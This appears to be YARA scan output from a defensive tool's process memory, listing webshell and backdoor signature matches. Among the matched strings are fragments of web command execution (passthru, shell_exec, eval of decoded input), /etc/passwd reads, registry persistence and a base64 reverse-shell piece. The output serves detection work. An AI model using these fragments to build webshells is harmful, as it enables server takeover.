- 0x30cfc3:$s7: $aids = passthru("perl cbs.pl ".$_POST['connhost']." ".$_POST['connport']);
- 0x30d01b:$s8: <b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='htt
- 0x3620b8:$s8: <b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='htt
- 0x30d076:$s14: $dump .= "-- Cyber-Warrior.Org\n";
- 0x30d0a5:$s20: if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_include_w_shell | PHP Webshells Github Archive - file php-include-w-shell.php | Florian Roth | - 0x30d225:$s13: # dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
- 0x30d271:$s17: "phpshellapp" => "export TERM=xterm; bash -i",
- 0x30d2ac:$s19: else if($numhosts == 1) $strOutput .= "On 1 host..\n";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_mysql_tool | PHP Webshells Github Archive - file mysql_tool.php | Florian Roth | - 0x30d417:$s12: $dump .= "-- Dumping data for table '$table'\n";
- 0x30d454:$s20: $dump .= "CREATE TABLE $table (\n";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_PhpSpy_Ver_2006 | PHP Webshells Github Archive - file PhpSpy Ver 2006.php | Florian Roth | - 0x30d5b6:$s2: var_dump(@$shell->RegRead($_POST['readregname']));
- 0x2e863f:$s12: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x30d5f5:$s12: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x3477d6:$s12: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x362514:$s12: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x30d64f:$s19: $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32
- 0x362565:$s19: $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32
- 0x30d6a8:$s20: $regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe'
- 0x3625b5:$s20: $regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe'
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_ZyklonShell | PHP Webshells Github Archive - file ZyklonShell.php | Florian Roth | - 0x30d82d:$s0: The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>
- 0x30d888:$s1: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- 0x30d8c7:$s2: <TITLE>404 Not Found</TITLE>
- 0x30d8f0:$s3: <H1>Not Found</H1>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_myshell | PHP Webshells Github Archive - file myshell.php | Florian Roth | - 0x30da3f:$s0: if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/outpu
- 0x362852:$s0: if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/outpu
- 0x30605e:$s5: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x30da97:$s5: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x35cc07:$s5: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x3628a0:$s5: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x30daef:$s15: <title>$MyShellVersion - Access Denied</title>
- 0x30db2a:$s16: }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTT
- 0x362921:$s16: }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTT
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_lolipop | PHP Webshells Github Archive - file lolipop.php | Florian Roth | - 0x30dcb3:$s3: $commander = $_POST['commander'];
- 0x30dce2:$s9: $sourcego = $_POST['sourcego'];
- 0x30dd0f:$s20: $result = mysql_query($loli12) or die (mysql_error());
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_simple_cmd | PHP Webshells Github Archive - file simple_cmd.php | Florian Roth | - 0x2fdb84:$s1: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x30de7b:$s1: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x2fdb55:$s2: <title>G-Security Webshell</title>
- 0x30debf:$s2: <title>G-Security Webshell</title>
- 0x2fdbc8:$s4: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x30deee:$s4: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x2fdc00:$s6: <? $cmd = $_REQUEST["-cmd"];?>
- 0x30df26:$s6: <? $cmd = $_REQUEST["-cmd"];?>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_go_shell | PHP Webshells Github Archive - file go-shell.php | Florian Roth | - 0x30e075:$s0: #change this password; for power security - delete this file =)
- 0x30e0c1:$s2: if (!defined$param{cmd}){$param{cmd}="ls -la"};
- 0x30e0fd:$s11: open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
- 0x30e13b:$s12: print << "[kalabanga]";
- 0x30e15f:$s13: <title>GO.cgi</title>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_aZRaiLPhp_v1_0 | PHP Webshells Github Archive - file aZRaiLPhp v1.0.php | Florian Roth | - 0x30e2b1:$s0: <font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED
- 0x362e9a:$s0: <font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED
- 0x30e308:$s4: $fileperm=base_convert($_POST['fileperm'],8,10);
- 0x30e345:$s19: touch ("$path/$dismi") or die("Dosya Olu
- 0x30e37a:$s20: echo "<div align=left><a href='./$this_file?dir=$path/$file'>G
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_webshells_zehir4 | Webshells Github Archive - file zehir4 | Florian Roth | - 0x30e4f9:$s0: frames.byZehir.document.execCommand(command, false, option);
- 0x30e542:$s8: response.Write "<title>ZehirIV --> Powered By Zehir <zehirhacker@hotmail.com
- 0x36308a:$s8: response.Write "<title>ZehirIV --> Powered By Zehir <zehirhacker@hotmail.com
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_zehir4_asp_php | PHP Webshells Github Archive - file zehir4.asp.php.txt | Florian Roth | - 0x30e6ce:$s4: response.Write "<title>zehir3 --> powered by zehir <zehirhacker@hotmail.com&
- 0x3631a8:$s4: response.Write "<title>zehir3 --> powered by zehir <zehirhacker@hotmail.com&
- 0x30e4f9:$s11: frames.byZehir.document.execCommand(
- 0x30e72a:$s11: frames.byZehir.document.execCommand(
- 0x30e75b:$s11: frames.byZehir.document.execCommand(
- 0x36304b:$s11: frames.byZehir.document.execCommand(
- 0x3631fb:$s11: frames.byZehir.document.execCommand(
- 0x363223:$s11: frames.byZehir.document.execCommand(
- 0x30e4f9:$s15: frames.byZehir.document.execCommand(co
- 0x30e75b:$s15: frames.byZehir.document.execCommand(co
- 0x36304b:$s15: frames.byZehir.document.execCommand(co
- 0x363223:$s15: frames.byZehir.document.execCommand(co
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_lostDC | PHP Webshells Github Archive - file lostDC.php | Florian Roth | - 0x30e8bc:$s0: $info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';
- 0x30e901:$s4: header ( "Content-Description: Download manager" );
- 0x30e941:$s5: print "<center>[ Generation time: ".round(getTime()-startTime,4)." second
- 0x363387:$s5: print "<center>[ Generation time: ".round(getTime()-startTime,4)." second
- 0x30e997:$s9: if (mkdir($_POST['dir'], 0777) == false) {
- 0x30e9ce:$s12: $ret = shellexec($command);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_CasuS_1_5 | PHP Webshells Github Archive - file CasuS 1.5.php | Florian Roth | - 0x30eb1c:$s2: <font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO
- 0x3634e1:$s2: <font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO
- 0x30eb73:$s8: $fonk_kap = get_cfg_var("fonksiyonlary_kapat");
- 0x30ebaf:$s18: if (file_exists("F:\\")){
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_ftpsearch | PHP Webshells Github Archive - file ftpsearch.php | Florian Roth | - 0x30ecfb:$s0: echo "[-] Error : coudn't read /etc/passwd";
- 0x30ed34:$s9: @$ftp=ftp_connect('127.0.0.1');
- 0x30ed60:$s12: echo "<title>Edited By KingDefacer</title><body>";
- 0x30ed9f:$s19: echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__Cyber_Shell_cybershell_Cyber_Shell__v_1_0_ | PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php | Florian Roth | - 0x30f01a:$s4: <a href="http://www.cyberlords.net" target="_blank">Cyber Lords Community</
- 0x363882:$s4: <a href="http://www.cyberlords.net" target="_blank">Cyber Lords Community</
- 0x30f073:$s10: echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?edit=$nameoffile&sh
- 0x3638d2:$s10: echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?edit=$nameoffile&sh
- 0x30f0cd:$s11: * Coded by Pixcher
- 0x30f0ef:$s16: <input type=text size=55 name=newfile value="$d/newfile.php">
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_soldierofallah | PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php | Florian Roth | - 0x30f38d:$s1: 'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
- 0x30f3d4:$s2: 'Running processes' => "runcommand('ps -aux','GET')",
- 0x30f416:$s3: $dt = $_POST['filecontent'];
- 0x30f43f:$s4: 'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
- 0x30f48f:$s6: print "Sorry, none of the command functions works.";
- 0x30f4d0:$s11: document.cmdform.command.value='';
- 0x30f4ff:$s12: elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST
- 0x363c52:$s12: elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_7 | PHP Webshells Github Archive - from files Mysql interface v1.0.php, MySQL Web Interface Version 0.8.php, Mysql_interface_v1.0.php, MySQL_Web_Interface_Version_0.8.php | Florian Roth | - 0x30f76f:$s0: header("Content-disposition: filename=$filename.sql");
- 0x30f7b2:$s1: else if( $action == "dumpTable" || $action == "dumpDB" ) {
- 0x30f7f9:$s2: echo "<font color=blue>[$USERNAME]</font> - \n";
- 0x30f836:$s4: if( $action == "dumpTable" )
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__Small_Web_Shell_by_ZaCo_small_zaco_zacosmall | PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php | Florian Roth | - 0x30fadf:$s2: if(!$result2)$dump_file.='#error table '.$rows[0];
- 0x30fb1e:$s4: if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
- 0x30fb69:$s6: header('Content-Length: '.strlen($dump_file)."\n");
- 0x30fba9:$s20: echo('Dump for '.$db_dump.' now in '.$to_file);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_8 | PHP Webshells Github Archive - from files Macker\'s Private PHPShell.php, PHP Shell.php, Safe0ver Shell -Safe Mod Bypass By Evilc0der.php | Florian Roth | - 0x30fdb1:$s1: elseif ( $cmd=="file" ) { /* View a file in text --> */
- 0x3086c8:$s2: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x30fdfa:$s2: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x30fe43:$s3: /* I added this to ensure the script will run correctly...
- 0x30fe8a:$s14: </form> -->
- 0x2df00c:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x2fa80d:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x30feac:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x341408:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x3545bb:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x30feed:$s20: elseif ( $cmd=="downl" ) { /* Save the edited file back to a file --> */
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__PH_Vayv_PHVayv_PH_Vayv_klasvayv_asp_php | PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt | Florian Roth | - 0x3101bc:$s1: <font color="#000000">Sil</font></a></font></td>
- 0x3101f9:$s5: <td width="122" height="17" bgcolor="#9F9F9F">
- 0x310234:$s6: onfocus="if (this.value == 'Kullan
- 0x310263:$s16: <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif">
- 0x3645e1:$s16: <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif">
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_9 | PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php | Florian Roth | - 0x3104e9:$s2: :<b>" .base64_decode($_POST['tot']). "</b>";
- 0x310522:$s6: if (isset($_POST['wq']) && $_POST['wq']<>"") {
- 0x31055d:$s12: if (!empty($_POST['c'])){
- 0x310583:$s13: passthru($_POST['c']);
- 0x3105a6:$s16: <input type="radio" name="tac" value="1">B64 Decode<br>
- 0x3105ea:$s20: <input type="radio" name="tac" value="3">md5 Hash
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__PH_Vayv_PHVayv_PH_Vayv | PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php | Florian Roth | - 0x310830:$s4: <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle
- 0x364a00:$s4: <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle
- 0x310885:$s12: <? if ($ekinci=="." or $ekinci=="..") {
- 0x3108ba:$s17: name="duzenx2" value="Klas
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_1 | PHP Webshells Github Archive - from files Dive Shell 1.0 - Emperor Hacking Team.php, Dive_Shell_1.0_Emperor_Hacking_Team.php, SimShell 1.0 - Simorgh Security MGZ.php, SimShell_1.0_-_Simorgh_Security_MGZ.php | Florian Roth | - 0x310b10:$s1: $token = substr($_REQUEST['command'], 0, $length);
- 0x310b4f:$s4: var command_hist = new Array(<?php echo $js_command_hist ?>);
- 0x310b99:$s7: $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
- 0x310bdc:$s9: document.shell.command.value = command_hist[current_line];
- 0x310c23:$s16: $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $
- 0x364ce0:$s16: $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $
- 0x310c78:$s19: if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
- 0x310cc1:$s20: if (e.keyCode == 38 && current_line < command_hist.length-1) {
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_2 | PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php | Florian Roth | - 0x310f73:$s3: if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
- 0x310fba:$s4: \$port = {$_POST['port']};
- 0x310fe1:$s5: $_POST['installpath'] = "temp.pl";}
- 0x311011:$s14: if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["u
- 0x364fc5:$s14: if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["u
- 0x31106b:$s16: copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]
- 0x365016:$s16: copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__CrystalShell_v_1_erne_stres | PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php | Florian Roth | - 0x3112d4:$s1: <input type='submit' value=' open (shill.txt) '>
- 0x311312:$s4: var_dump(curl_exec($ch));
- 0x311338:$s7: if(empty($_POST['Mohajer22'])){
- 0x311364:$s10: $m=$_POST['curl'];
- 0x311383:$s13: $u1p=$_POST['copy'];
- 0x3113a4:$s14: if(empty(\$_POST['cmd'])){
- 0x3113cb:$s15: $string = explode("|",$string);
- 0x3113f7:$s16: $stream = imap_open("/etc/passwd", "", "");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_3 | PHP Webshells Github Archive - from files Antichat Shell v1.3.php, Antichat Shell. Modified by Go0o$E.php, Antichat Shell.php, fatal.php | Florian Roth | - 0x311642:$s0: header('Content-Length:'.filesize($file).'');
- 0x31167c:$s4: <textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['comma
- 0x365442:$s4: <textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['comma
- 0x3116cc:$s7: if(filetype($dir . $file)=="file")$files[]=$file;
- 0x31170a:$s14: elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
- 0x31174b:$s20: $info .= (($perms & 0x0004) ? 'r' : '-');
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_4 | PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php | Florian Roth | - 0x302681:$s0: if ($filename != "." and $filename != ".."){
- 0x311a3b:$s0: if ($filename != "." and $filename != ".."){
- 0x311a74:$s2: $owner["write"] = ($mode & 00200) ? 'w' : '-';
- 0x3124e6:$s2: $owner["write"] = ($mode & 00200) ? 'w' : '-';
- 0x311aaf:$s5: $owner["execute"] = ($mode & 00100) ? 'x' : '-';
- 0x311aec:$s6: $world["write"] = ($mode & 00002) ? 'w' : '-';
- 0x311b27:$s7: $world["execute"] = ($mode & 00001) ? 'x' : '-';
- 0x312522:$s7: $world["execute"] = ($mode & 00001) ? 'x' : '-';
- 0x311b64:$s10: foreach ($arr as $filename) {
- 0x311b8e:$s19: else if( $mode & 0x6000 ) { $type='b'; }
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_GFS | PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php | Florian Roth | - 0x311de9:$s0: OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
- 0x311e29:$s1: lIENPTk47DQpleGl0IDA7DQp9DQp9";
- 0x311e55:$s2: Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm
- 0x3659fd:$s2: Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__CrystalShell_v_1_sosyete_stres | PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php | Florian Roth | - 0x3120ca:$s1: A:visited { COLOR:blue; TEXT-DECORATION: none}
- 0x312105:$s4: A:active {COLOR:blue; TEXT-DECORATION: none}
- 0x31213e:$s11: scrollbar-darkshadow-color: #101842;
- 0x31216f:$s15: <a bookmark="minipanel">
- 0x312194:$s16: background-color: #EBEAEA;
- 0x3121bb:$s18: color: #D5ECF9;
- 0x3121d7:$s19: <center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 border
- 0x365c88:$s19: <center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 border
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_10 | PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php | Florian Roth | - 0x31249f:$s2: $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
- 0x3124e6:$s6: $owner["write"] = ($mode & 00200) ? 'w' : '-';
- 0x312522:$s11: $world["execute"] = ($mode & 00001) ? 'x' : '-';
- 0x312560:$s12: else if( $mode & 0xA000 )
- 0x312587:$s17: $s=sprintf("%1s", $type);
- 0x3125ae:$s20: font-size: 8pt;
- 0x313f2a:$s20: font-size: 8pt;
- 0x3670b5:$s20: font-size: 8pt;
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_11 | PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php | Florian Roth | - 0x312844:$s5: $filename = $backupstring."$filename";
- 0x312877:$s6: while ($file = readdir($folder)) {
- 0x3128a6:$s7: if($file != "." && $file != "..")
- 0x3128d4:$s9: $backupstring = "copy_of_";
- 0x3128fc:$s10: if( file_exists($file_name))
- 0x312925:$s13: global $file_name, $filename;
- 0x31294f:$s16: copy($file,"$filename");
- 0x312974:$s18: <td width="49%" height="142">
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__findsock_php_findsock_shell_php_reverse_shell | PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php | Florian Roth | - 0x312bd2:$s1: // me at pentestmonkey@pentestmonkey.net
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_6 | PHP Webshells Github Archive - from files c0derz shell [csh | unknown | - 0x312e61:$s2: @eval(stripslashes($_POST['phpcode']));
- 0x312e95:$s5: echo shell_exec($com);
- 0x312eb8:$s7: if($sertype == "winda"){
- 0x312edd:$s8: function execute($com)
- 0x312f00:$s12: echo decode(execute($cmd));
- 0x312f28:$s15: echo system($com);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Unpack_Injectt | Webshells Auto-generated - file Injectt.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31305b:$s2: %s -Run -->To Install And Run The Service
- 0x366696:$s2: %s -Run -->To Install And Run The Service
- 0x3130ae:$s3: %s -Uninstall -->To Uninstall The Service
- 0x3666df:$s3: %s -Uninstall -->To Uninstall The Service
- 0x3130fb:$s4: (STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN
- 0x366722:$s4: (STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_DevPack_fso | Webshells Auto-generated - file fso.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31326b:$s0: PageFSO Below -->
- 0x366824:$s0: PageFSO Below -->
- 0x31328e:$s1: theFile.writeLine("<script language=""vbscript"" runat=server>if request("""&cli
- 0x36683d:$s1: theFile.writeLine("<script language=""vbscript"" runat=server>if request("""&cli
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FeliksPack3___PHP_Shells_ssh | Webshells Auto-generated - file ssh.php | Yara Bulk Rule Generator by Florian Roth | - 0x313409:$s0: eval(gzinflate(str_rot13(base64_decode('
- 0x36694a:$s0: eval(gzinflate(str_rot13(base64_decode('
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Debug_BDoor | Webshells Auto-generated - file BDoor.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31354d:$s1: \BDoor\
- 0x316be0:$s1: \BDoor\
- 0x3201ef:$s1: \BDoor\
- 0x366a20:$s1: \BDoor\
- 0x368ff1:$s1: \BDoor\
- 0x36f665:$s1: \BDoor\
- 0x2ceb52:$s4: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- 0x313561:$s4: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- 0x3364e6:$s4: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- 0x366a2a:$s4: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | bin_Client | Webshells Auto-generated - file Client.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3136aa:$s0: Recieved respond from server!!
- 0x366b05:$s0: Recieved respond from server!!
- 0x3136d5:$s4: packet door client
- 0x366b26:$s4: packet door client
- 0x3136f4:$s5: input source port(whatever you want):
- 0x366b3b:$s5: input source port(whatever you want):
- 0x313726:$s7: Packet sent,waiting for reply...
- 0x366b63:$s7: Packet sent,waiting for reply...
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ZXshell2_0_rar_Folder_ZXshell | Webshells Auto-generated - file ZXshell.exe | Yara Bulk Rule Generator by Florian Roth | - 0x313876:$s0: WPreviewPagesn
- 0x366c45:$s0: WPreviewPagesn
- 0x313891:$s1: DA!OLUTELY N
- 0x366c56:$s1: DA!OLUTELY N
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | RkNTLoad | Webshells Auto-generated - file RkNTLoad.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3139b9:$s1: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x31a443:$s1: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x366d10:$s1: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x36b6a4:$s1: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x313a14:$s2: 5pur+virtu!
- 0x313c4c:$s2: 5pur+virtu!
- 0x366d61:$s2: 5pur+virtu!
- 0x366edb:$s2: 5pur+virtu!
- 0x313a2c:$s3: ugh spac#n
- 0x366d6f:$s3: ugh spac#n
- 0x313a43:$s4: xcEx3WriL4
- 0x366d7c:$s4: xcEx3WriL4
- 0x15d1d6:$s5: runtime error
- 0x16d481:$s5: runtime error
- 0x313a5a:$s5: runtime error
- 0x366d89:$s5: runtime error
- 0x313a74:$s6: loseHWait.Sr.
- 0x366d99:$s6: loseHWait.Sr.
- 0x313a8e:$s7: essageBoxAw
- 0x366da9:$s7: essageBoxAw
- 0x313aa6:$s8: $Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | binder2_binder2 | Webshells Auto-generated - file binder2.exe | Yara Bulk Rule Generator by Florian Roth | - 0x313c12:$s0: IsCharAlphaNumericA
- 0x366eb5:$s0: IsCharAlphaNumericA
- 0x8bf9c:$s2: WideCharToM
- 0x10e24f:$s2: WideCharToM
- 0x313c32:$s2: WideCharToM
- 0x366ecb:$s2: WideCharToM
- 0x313c4a:$s4: g 5pur+virtu!
- 0x366ed9:$s4: g 5pur+virtu!
- 0x313c64:$s5: \syslog.en
- 0x366ee9:$s5: \syslog.en
- 0x313c7b:$s6: heap7'7oqk?not=
- 0x366ef6:$s6: heap7'7oqk?not=
- 0x313c97:$s8: - Kablto in
- 0x366f08:$s8: - Kablto in
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | thelast_orice2 | Webshells Auto-generated - file orice2.php | Yara Bulk Rule Generator by Florian Roth | - 0x313dc2:$s0: $aa = $_GET['aa'];
- 0x366fc5:$s0: $aa = $_GET['aa'];
- 0x313de2:$s1: echo $aa;
- 0x366fdb:$s1: echo $aa;
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_sincap | Webshells Auto-generated - file sincap.php | Yara Bulk Rule Generator by Florian Roth | - 0x313f09:$s0: <font color="#E5E5E5" style="font-size: 8pt; font-weight: 700" face="Arial">
- 0x367094:$s0: <font color="#E5E5E5" style="font-size: 8pt; font-weight: 700" face="Arial">
- 0x313f66:$s4: <body text="#008000" bgcolor="#808080" topmargin="0" leftmargin="0" rightmargin=
- 0x3670e7:$s4: <body text="#008000" bgcolor="#808080" topmargin="0" leftmargin="0" rightmargin=
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PhpShell | Webshells Auto-generated - file PhpShell.php | Yara Bulk Rule Generator by Florian Roth | - 0x3140d2:$s2: href="http://www.gimpster.com/wiki/PhpShell">www.gimpster.com/wiki/PhpShell</a>.
- 0x3671e5:$s2: href="http://www.gimpster.com/wiki/PhpShell">www.gimpster.com/wiki/PhpShell</a>.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_DevPack_config | Webshells Auto-generated - file config.asp | Yara Bulk Rule Generator by Florian Roth | - 0x314248:$s0: const adminPassword="
- 0x3672ed:$s0: const adminPassword="
- 0x31426a:$s2: const userPassword="
- 0x367305:$s2: const userPassword="
- 0x31428b:$s3: const mVersion=
